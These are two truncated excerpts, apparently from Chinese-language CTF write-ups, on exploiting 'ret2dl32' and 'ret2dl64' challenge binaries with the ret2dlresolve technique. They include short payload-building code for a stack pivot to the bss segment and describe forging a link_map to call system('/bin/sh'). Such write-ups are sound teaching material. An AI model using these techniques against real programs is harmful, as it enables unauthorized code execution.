ret2dl32 首先检查一下保护: IDA分析一下 程序很简单就是,往bss段上的buf读入0x400个数据,然后拷贝到栈上.read_got还被置为0,这一看就是要逼着你使用ret2dlresolve. 首先我们程序劫持到bss段 padding = '\x00'*0x10c padding += p32(base_stage+4)+'\x00'*8+ p32(base_stage+0x500) padding = padding.ljust(0x300,'\x00') 上面的代码使得我们把…

ret2dl64 ret2dl64 与ret2dl32不同,ret2dl64需要知道libc. 检查保护: IDA看一看 read_got 被置为0,强制你使用ret2dlresolve. 我们先伪造link_map,然后让程序去执行我们伪造的link_map,执行system('/bin/sh'). 首先我们需要恢复read函数的got表,方法就是布置好参数跳转到plt0重新解析read函数. bin_sh = fake_link_map_addr + 0x78 payload = fake_…